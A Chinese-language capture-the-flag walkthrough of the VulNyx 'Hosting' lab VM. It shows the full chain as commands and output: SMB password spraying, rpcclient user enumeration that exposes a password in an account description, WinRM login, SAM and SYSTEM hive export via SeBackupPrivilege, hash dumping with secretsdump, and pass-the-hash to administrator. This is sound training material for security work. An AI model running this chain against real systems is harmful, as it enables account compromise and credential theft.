VulNyx Hosting Walkthrough

另一台win系统的靶机,下载地址为https://vulnyx.com/file/Hosting.php。
Tips:smb、rpcclient、HKLM备份导出、一些常用的windows命令行。

扫描端口,开了80和smb,还有一堆rpc端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 21:11 CST
Nmap scan report for 192.168.56.149
Host is up (0.00040s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:B4:BE:70 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

有80端口通常先访问一下,再扫描一下目录。

└─$ gobuster dir -u http://$IP -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500  -o 80.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   401,403,404,500
[+] User Agent:              gobuster/3.6
[+] Extensions:              aspx,txt,html,php,asp
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/speed                (Status: 301) [Size: 162] [--> http://192.168.56.149/speed/]
/Speed                (Status: 301) [Size: 162] [--> http://192.168.56.149/Speed/]

在speed下面是一个网站。

└─$ gobuster dir -u http://$IP/speed -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500  -o 80_speed.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.149/speed
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,500,401,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              aspx,txt,html,php,asp
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 169] [--> http://192.168.56.149/speed/images/]
/index.html           (Status: 200) [Size: 29831]
/Images               (Status: 301) [Size: 169] [--> http://192.168.56.149/speed/Images/]
/css                  (Status: 301) [Size: 166] [--> http://192.168.56.149/speed/css/]
/Index.html           (Status: 200) [Size: 29831]
/js                   (Status: 301) [Size: 165] [--> http://192.168.56.149/speed/js/]
/fonts                (Status: 301) [Size: 168] [--> http://192.168.56.149/speed/fonts/]
/IMAGES               (Status: 301) [Size: 169] [--> http://192.168.56.149/speed/IMAGES/]
/INDEX.html           (Status: 200) [Size: 29831]
/Fonts                (Status: 301) [Size: 168] [--> http://192.168.56.149/speed/Fonts/]
/CSS                  (Status: 301) [Size: 166] [--> http://192.168.56.149/speed/CSS/]
/JS                   (Status: 301) [Size: 165] [--> http://192.168.56.149/speed/JS/]

网页上面有四个人的姓名,这是网页唯一提供的线索,且没有别的动态入口。

这里需要将人名改写为简称,并加入字典文件(外国人的习惯)。

└─$ cat user.txt                                                        
p.smith
a.krist
m.faeny
k.lendy

对这几个用户名进行爆破,可以得到p.smith的密码。

└─$ crackmapexec smb $IP -u user.txt -p /usr/share/wordlists/rockyou.txt
SMB         192.168.56.149  445    HOSTING          [+] HOSTING\p.smith:kissme

└─$ smbclient -L $IP -U p.smith%kissme   

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Admin remota
        C$              Disk      Recurso predeterminado
        IPC$            IPC       IPC remota

通过smb并没有发现什么有用的信息,且p.smith无法登录winrm,但可以登录rcp。通过浏览rpc信息,可以发现多了一个用户名j.wilson,且有一串类似密码的信息。

└─$ rpcclient  -U p.smith $IP 
Password for [WORKGROUP\p.smith]:
rpcclient $> enumdomusers
user:[Administrador] rid:[0x1f4]
user:[administrator] rid:[0x3ea]
user:[DefaultAccount] rid:[0x1f7]
user:[f.miller] rid:[0x3ec]
user:[Invitado] rid:[0x1f5]
user:[j.wilson] rid:[0x3ee]
user:[m.davis] rid:[0x3ed]
user:[p.smith] rid:[0x3eb]
user:[WDAGUtilityAccount] rid:[0x1f8]
rpcclient $> querydispinfo
index: 0x1 RID: 0x1f4 acb: 0x00000211 Account: Administrador    Name: (null)    Desc: (null)
index: 0x2 RID: 0x3ea acb: 0x00000214 Account: administrator    Name: Administrator     Desc: (null)
index: 0x3 RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount   Name: (null)    Desc: (null)
index: 0x4 RID: 0x3ec acb: 0x00000214 Account: f.miller Name: Frank Miller      Desc: (null)
index: 0x5 RID: 0x1f5 acb: 0x00000215 Account: Invitado Name: (null)    Desc: (null)
index: 0x6 RID: 0x3ee acb: 0x00000214 Account: j.wilson Name: John Wilson       Desc: (null)
index: 0x7 RID: 0x3ed acb: 0x00000214 Account: m.davis  Name: Mike Davis        Desc: H0$T1nG123!
index: 0x8 RID: 0x3eb acb: 0x00000214 Account: p.smith  Name: Paul Smith        Desc: (null)
index: 0x9 RID: 0x1f8 acb: 0x00000011 Account: WDAGUtilityAccount       Name: (null)    Desc: (null)

将j.wilson加入刚才建立的用户名字典,并使用得到的密码字符串进行测试,果然可以临winrm。

└─$ echo j.wilson >> user.txt
└─$ netexec winrm $IP -u user.txt -p 'H0$T1nG123!'
WINRM       192.168.56.149  5985   HOSTING          [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\p.smith:H0$T1nG123!
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\a.krist:H0$T1nG123!
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\m.faeny:H0$T1nG123!
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.149  5985   HOSTING          [-] HOSTING\k.lendy:H0$T1nG123!
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.149  5985   HOSTING          [+] HOSTING\j.wilson:H0$T1nG123! (Pwn3d!)

└─$ evil-winrm -i $IP -u j.wilson  -p 'H0$T1nG123!'          

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami
hosting\j.wilson

有了用户shell后,接下来看j.wilson有什么权限,其中BackupPrivilege非常重要,说明可以备份导出SAM等关键信息。

*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami /priv

INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                         Estado
============================= =================================================== ==========
SeBackupPrivilege             Hacer copias de seguridad de archivos y directorios Habilitada
SeRestorePrivilege            Restaurar archivos y directorios                    Habilitada
SeShutdownPrivilege           Apagar el sistema                                   Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido                    Habilitada
SeUndockPrivilege             Quitar equipo de la estaci¢n de acoplamiento        Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso        Habilitada
SeTimeZonePrivilege           Cambiar la zona horaria                             Habilitada

将SAM、SYSTEM导出,并通evil-winrm下载到本地。

*Evil-WinRM* PS C:\Users\j.wilson\Documents> reg save hklm\sam sam
La operaci¢n se complet¢ correctamente.

*Evil-WinRM* PS C:\Users\j.wilson\Documents> reg save hklm\system system
La operaci¢n se complet¢ correctamente.

Info: Downloading C:\Users\j.wilson\Documents\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\j.wilson\Documents> download system

Info: Downloading C:\Users\j.wilson\Documents\system to system

Info: Download successful!

使用impacket脚本本地读取SAM和SYSTEM,得到管理员的hash。

└─$ impacket-secretsdump LOCAL -system system -sam sam 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::

使用管理员hash登录,得到root shell。

└─$ evil-winrm -i $IP -u administrator  -H 41186fb28e283ff758bb3dbeb6fb4a5c

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
hosting\administrator

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注